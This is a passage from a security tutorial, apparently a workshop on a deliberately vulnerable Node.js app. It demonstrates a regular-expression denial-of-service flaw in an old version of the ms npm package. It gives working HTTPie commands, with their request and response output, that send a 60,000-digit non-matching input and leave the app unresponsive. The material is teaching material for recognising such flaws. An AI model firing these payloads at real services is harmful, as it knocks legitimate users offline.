Example 3
Our third example vulnerability is with the ms npm package. This is a module that allows easy conversion of various time formats into milliseconds. The issue here is that we are using [email protected] and this has a Regular Expression Denial of Service (ReDos) vulnerability.
What this package allows us to do is to take a string input and parse into milliseconds which our application will then use to send a reminder. For example:
To demonstrate this vulnerability, we will move to the terminal. Let's run the following command against our application:
echo 'content=Reboot server in 20 minutes' | http --form $GOOF_HOST/create -v
�The result will be console output similar to this:
POST /create HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 36
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Host: elb.amazonaws.com
User-Agent: HTTPie/2.1.0
content=Reboot server in 20 minutes
HTTP/1.1 302 Found
Connection: keep-alive
Content-Length: 28
Content-Type: text/html; charset=utf-8
Date: Sat, 13 Jun 2020 21:20:16 GMT
ETag: W/"1c-41a86905"
Location: /
Vary: X-HTTP-Method-Override
X-Powered-By: Express
UmVib290IHNlcnZlciBbMjBtXQ==
A corresponding web result will look like this:
Now we will take the previous command but print the digit 5 a total of 60,000 times. This regular expression will take a non-linear amount of time to process an input. The longer the input, the longer the processing time. Let's run the following command
echo 'content=Reboot server in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form $GOOF_HOST/create -v
The result here was surprisingly fast. However, what happens when the regular expression does not match? To illustrate this, let's take the same command and swap the s in minutes for an a instead. Type the following command:
echo 'content=Reboot server in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form $GOOF_HOST/create -v
This command will take a while to process and result in a non-responsive application. If you try to add or remove tasks the application will not respond and you have blocked legitimate requests from processing.
Last modified 1mo ago
Export as PDF
Copy link
Edit on GitHub